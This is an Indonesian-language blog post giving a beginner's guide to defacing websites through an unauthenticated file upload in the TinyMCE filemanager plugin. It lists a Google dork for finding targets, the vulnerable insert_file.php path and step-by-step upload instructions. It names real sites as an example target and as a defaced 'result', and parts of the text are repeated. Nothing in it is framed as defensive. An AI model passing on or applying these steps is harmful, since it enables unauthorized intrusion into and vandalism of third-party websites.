| Filename | Deface dengan CMS Webconstructor File Upload Vulnerability |
| Permission | rw-r--r-- |
| Author | Fahmi J |
| Date and Time | 09.11 |
| Label | CMS| Defacing| File Manager| Remote File |
| Action |
Assalamu'alaikum
Kali ini saya akan share teknik deface yang kemarin saya dapat dari bang ENno. Tekniknya cukup mudah terutama bagi yang newbie culun seperti saya. :v
Oke, langsung saja.
Bahan :
Sekarang kita mulai prakteknya.
Ekstensi file yang adpat diupload adalah html, pdf, txt, doc, jpg . Tidak support file .php sehingga tidak bisa upload shell.
CMS Webconstructor File Upload Vulnerability
Thanks to : ENNo Area
Hasil ane http://www.steulaliegites.com/tinymce/jscripts/tiny_mce/plugins/filemanager/files/~cddorg.html
Sumber : Madura Cyber
Kali ini saya akan share teknik deface yang kemarin saya dapat dari bang ENno. Tekniknya cukup mudah terutama bagi yang newbie culun seperti saya. :v
Oke, langsung saja.
Bahan :
- Google Dork : inurl:tiny_mce/plugins/filemanager [untuk dork lain silahkan dikembangkan sendiri]
- Exploit : [localhost]/PATH/tiny_mce/plugins/filemanager/insertfile/insert_file.php
Sekarang kita mulai prakteknya.
- Buka google dan cari target dengan dork diatas.
- Sebagai contoh saya pilih http://rofel.pl/tiny_mce/plugins/filemanager/
- masukkan exploitnya sehingga menjadi http://rofel.pl/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
- Upload filenya. Sebagai contoh saya upload file dengan nama suram.html
- Jika upload sukses, maka kalian akan melihat alamat filenya di bawah. Yaitu di http://rofel.pl/upload/suram.html
- Dan sekarang, foto nabilahJKT48 sudah terpasang di web tersebut. :v
Ekstensi file yang adpat diupload adalah html, pdf, txt, doc, jpg . Tidak support file .php sehingga tidak bisa upload shell.
CMS Webconstructor File Upload Vulnerability
Thanks to : ENNo Area
Hasil ane http://www.steulaliegites.com/tinymce/jscripts/tiny_mce/plugins/filemanager/files/~cddorg.html
Sumber : Madura Cyber
0 komentar:
Posting Komentar